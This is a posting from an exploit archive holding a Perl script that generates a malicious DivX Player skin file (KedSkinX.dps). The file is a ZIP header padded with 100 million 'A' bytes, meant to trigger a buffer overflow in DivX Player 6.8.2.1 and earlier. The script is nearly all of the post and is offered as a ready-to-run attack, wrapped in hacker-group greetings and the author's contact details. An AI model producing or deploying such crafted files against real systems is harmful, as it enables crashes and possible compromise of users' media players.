[D] DivX Player 'Skins' V<=6.8.2.1 Buffer Overflow [Z]

2011-02-26 17:35:45
Posted by: kedans

#!/usr/bin/perl

###
# Title : DivX Player 'Skins' V&lt;=6.8.2.1 Buffer Overflow
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Fran&ccedil;ais &amp; Arabic
# Target : DivX Player Version 6.8.2.1 and all Versions 6.x
###

# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com

#START SYSTEM /root@MSdos/ :
system(&quot;title KedAns-Dz&quot;);
system(&quot;color 1e&quot;);
system(&quot;cls&quot;);

print &quot;\n\n&quot;.
&quot; ||========================================||\n&quot;.
&quot; || ||\n&quot;.
&quot; || DivX Player 'Skins' V&lt;=6.8.2.1 ||\n&quot;.
&quot; || Exploit Buffer Overflow ||\n&quot;.
&quot; || Created BY KedAns-Dz ||\n&quot;.
&quot; || ked-h(at)hotmail(dot)com ||\n&quot;.
&quot; || ||\n&quot;.
&quot; ||========================================||\n\n\n&quot;;
sleep(2);
print &quot;\n&quot;;
print &quot; [!] Please Wait Till c0de Generate...\n&quot;;
my $ked = &quot;\x41&quot; x 100000000 ; # Integer Overflow
my $Buf =
&quot;\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x7b\x4f\x39\x38\x56\x1f&quot;. # Skin index
&quot;\xbf\xe7\x06\x45\x00\x00\x8b\x45\x00\x00&quot;.
&quot;$ked\x3e&quot;; # end Skin index
$file = &quot;KedSkinX.dps&quot;; # Evil File ( Divx.Player.Skin )
open (F ,&quot;&gt;$file&quot;);
print F $Buf;
sleep (2);
print &quot;\n [+] Creat File : $file , Succesfully ! \n&quot;;
close (F);

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# &gt; Algerians &lt; [D] HaCkerS-StreeT-Team [Z] &gt; Hackers &lt;
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =&gt;&gt;
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

Fixes

No fixes

In order to submit a new fix you need to be registered.